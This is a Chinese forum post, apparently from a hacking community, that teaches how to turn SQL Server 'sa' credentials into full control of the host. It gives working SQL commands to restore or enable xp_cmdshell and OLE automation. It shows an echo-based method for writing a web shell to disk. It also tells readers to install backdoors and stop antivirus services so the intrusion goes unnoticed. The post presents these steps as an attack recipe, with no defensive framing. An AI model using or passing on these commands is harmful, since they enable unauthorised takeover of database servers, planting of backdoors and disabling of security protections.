马上注册,结交更多好友,享用更多功能。
您需要 登录 才可以下载或查看,没有帐号?注册
x
SQL 2000 / SQL 2005 数据库
当你得到了SA权限时,有些人会说拿不了服务器的最大权限, 看来会不会是长相问题?
分析如下:
ConnString :
server=IP;UID=sa WD=password;database=masterrovider=SQLOLEDB
很多时候可能会遇到删除了'sp_OACreate' 'xp_cmdshell'
可以用下面的方法尝试恢复添加
SQL2000:
Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')
Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')
SQL2005:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
在这里,传说中的SQL2005安全性比较高的,在SA权限下显得更加没了地位了!
好了,添加好了这些. 此时就真的要看你的长相了..
利用什么方法上传自己的SHELL呢? 网上的方法也一大把.
我这里提供一个比较简单的方法:
echo写入SEHLL
格式如下:
Exec master.dbo.xp_cmdshell 'echo 代码 > name.txt'
这个可要自由发挥了...
关于如何找路径,那些就不说了,实在是没点技术含量了.
上传了SHELL,接下来操作就会顺利一点. 传一些服务级后门之类的.
再次通过xp_cmdshell 运行后门.
此时你会遇到很多问题,比如你的后门会不会被杀? 服务器安装了什么杀软? 这些都是小问题,完全可以通过相关的命令让那些阻挠你的软件去死.
DOS命令,会吧? 直接STOP那些服务就OK了!最后运行后门,进入你的目标主机! |
IP卡
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
